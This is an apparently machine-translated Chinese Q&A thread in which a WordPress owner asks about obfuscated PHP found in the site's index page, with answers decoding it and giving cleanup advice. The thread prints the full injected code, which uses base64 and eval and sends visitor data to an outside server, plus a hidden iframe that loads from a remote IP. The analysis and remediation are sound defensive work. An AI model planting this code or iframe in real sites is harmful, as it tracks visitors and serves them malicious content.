我有一个wordpress网站,最近我看到加载索引页面太慢了。两个星期以来,我一直试图找到问题,但一无所获。最后一天,我备份了所有文件并从我的网站上删除了所有文件,当我在记事本++中打开我的网站索引页时。
我看到太多奇怪的代码,当我在本地运行我的网站时,我的防病毒软件会发出太多警告并阻止大量外部连接。 我在我的网站索引页面上看到了这段代码:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
告诉我为什么这个代码在我的页面中以及如何到达那里,我发现这个没有其他页面也告诉我现在应该怎么做以及当我在wamp中加载页面时我的eset防病毒说这个:
Details:
Web page:
http://91.196.216.30/bt.php?ip=127.0.0.1&host=localhost&uri=/web/wordpress/&ua=mozilla/5.0+(windows+nt+6.1)+applewebkit/535.1+(khtml,+like+gecko)+chrome/14.0.835.187+safari/535.1&ref=
Description:
Access to the web page was blocked by ESET NOD32 Antivirus.
The web page is on the list of websites with potentially dangerous content.
www.eset.com
答案 0 :(得分:0)
字符串解码为:
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
$ _ X解码为:
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>
然后通过将123456aouie
中的所有字符替换为aouie123456
中的字符来进一步处理$ _X。
不好。
答案 1 :(得分:0)
它是一种恶意软件。您应该执行以下操作(非常快):
eval(base64_decode(
和iframe
的本地目录。删除它们!您希望在案例中查看的行是:
<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>
和
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1I pOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
通常在?>
之后添加eval部分,通常在index
个文件中添加,但也许在任何地方。它用于翻页诈骗。
如果您想了解更多信息,请点击此处:http://en.wikipedia.org/wiki/Iframe_virus